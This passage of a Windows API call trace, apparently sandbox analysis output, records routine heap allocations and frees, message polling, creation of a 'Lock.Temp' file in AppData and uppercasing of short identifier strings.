Flags=0x0, Size=0x38) returned 0x246d820 [0250.030] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10000) returned 0x3551008 [0250.030] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab68 [0250.030] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0250.030] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Local/Lock.Temp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\lock.temp"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2bc [0250.031] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466d90 [0250.031] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0250.031] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa898 | out: hHeap=0x25c0000) returned 1 [0250.031] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa60 | out: hHeap=0x25c0000) returned 1 [0250.031] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa808 | out: hHeap=0x25c0000) returned 1 [0250.031] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0250.031] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0250.031] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0250.031] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0250.031] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0250.031] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0250.031] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0250.032] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0250.032] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0250.032] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0250.032] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0250.032] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0250.032] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0250.032] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0250.032] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0250.032] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0250.032] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0250.032] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0250.032] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa808 [0250.032] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0250.032] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa60 [0250.032] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa898 [0250.032] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0250.032] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0250.032] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0250.032] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0250.033] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa898 | out: hHeap=0x25c0000) returned 1 [0250.033] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa60 | out: hHeap=0x25c0000) returned 1 [0250.033] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0250.033] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0250.033] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa60 [0250.033] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa898 [0250.033] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0250.033] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0250.033] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0250.033] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0250.033] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa898 | out: hHeap=0x25c0000) returned 1 [0250.033] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa60 | out: hHeap=0x25c0000) returned 1 [0250.033] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0250.033] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0250.033] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0250.033] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa60 [0250.033] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa898 [0250.033] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0250.033] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0250.033] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa808 | out: hHeap=0x25c0000) returned 1 [0250.034] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0250.034] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0250.034] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0250.034] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0250.034] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0250.034] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0250.034] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa60 | out: hHeap=0x25c0000) returned 1 [0250.034] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0250.034] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0250.034] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa60 [0250.034] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0250.034] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0250.034] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0250.034] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0250.034] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1788 [0250.034] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0250.034] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0250.034] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0250.034] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0250.034] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0250.035] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa60 | out: hHeap=0x25c0000) returned 1 [0250.035] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0250.035] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0250.035] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0250.035] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0250.035] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0250.035] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0250.035] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0250.035] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0250.035] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0250.035] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0250.035] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0250.035] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0250.035] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0250.035] CharUpperBuffW (in: lpsz="A6000504F44", cchLength=0xb | out: lpsz="A6000504F44") returned 0xb [0250.035] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0250.035] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0250.035] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa60 [0250.035] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1728 [0250.036] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0250.036] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0250.036] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0250.036] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa808 [0250.036] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0250.036] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1788 [0250.036] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0250.036] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0250.036] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0250.036] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2db8 [0250.036] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0250.036] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0250.036] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0250.036] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b17a8 [0250.036] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0250.036] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0250.036] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0250.036] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa358 [0250.036] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0250.037] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0250.037] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18d8 [0250.037] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0250.037] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0250.037] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0250.037] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0250.037] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0250.037] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0250.037] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16f8 [0250.037] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0250.037] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0250.037] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0250.037] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0250.037] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0250.037] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1bf8 [0250.037] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0250.038] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0250.038] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0250.038] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0250.038] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0250.038] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0250.038] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0250.038] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0250.038] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0250.038] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0250.038] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0250.038] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0250.038] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0250.038] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7d8 [0250.038] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa90 [0250.038] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0250.038] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa940 [0250.038] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0250.038] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17e8 [0250.038] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c90 [0250.038] CharUpperBuffW (in: lpsz="SSA6000504F44", cchLength=0xd | out: lpsz="SSA6000504F44") returned 0xd [0250.039] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0250.039] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0250.039] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0250.039] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa90 | out: hHeap=0x25c0000) returned 1 [0250.039] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7d8 | out: hHeap=0x25c0000) returned 1 [0250.039] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0250.039] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0250.039] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8a0 [0250.039] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0250.039] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8a0 | out: hHeap=0x25c0000) returned 1 [0250.039] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0250.039] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7d8 [0250.039] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7d8 | out: hHeap=0x25c0000) returned 1 [0250.039] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0250.039] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0250.039] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0250.039] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7d8 | out: hHeap=0x25c0000) returned 1 [0250.039] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0250.040] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7d8 | out: hHeap=0x25c0000) returned 1 [0250.040] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8e0 | out: hHeap=0x25c0000) returned 1 [0250.040] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0250.040] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0250.040] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7d8 | out: hHeap=0x25c0000) returned 1 [0250.040] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0250.040] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7d8 | out: hHeap=0x25c0000) returned 1 [0250.040] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0250.040] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0250.040] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0250.040] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7d8 | out: hHeap=0x25c0000) returned 1 [0250.040] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0250.040] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7d8 | out: hHeap=0x25c0000) returned 1 [0250.040] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0250.041] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0250.041] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0250.041] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7d8 | out: hHeap=0x25c0000) returned 1 [0250.041] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0250.041] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7d8 | out: hHeap=0x25c0000) returned 1 [0250.041] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0250.041] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0250.041] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0250.041] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7d8 | out: hHeap=0x25c0000) returned 1 [0250.041] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0250.041] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0250.041] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0250.041] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0250.041] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0250.041] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0250.041] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0250.041] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0250.041] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0250.042] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0250.042] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0250.042] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0250.042] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0250.042] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0250.042] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0250.042] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8a0 | out: hHeap=0x25c0000) returned 1 [0250.042] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0250.042] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0250.042] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0250.042] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0250.042] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0250.042] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0250.042] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0250.042] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0250.042] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0250.042] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0250.042] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0250.043] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0250.043] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0250.043] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0250.043] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0250.043] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8a0 | out: hHeap=0x25c0000) returned 1 [0250.043] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, 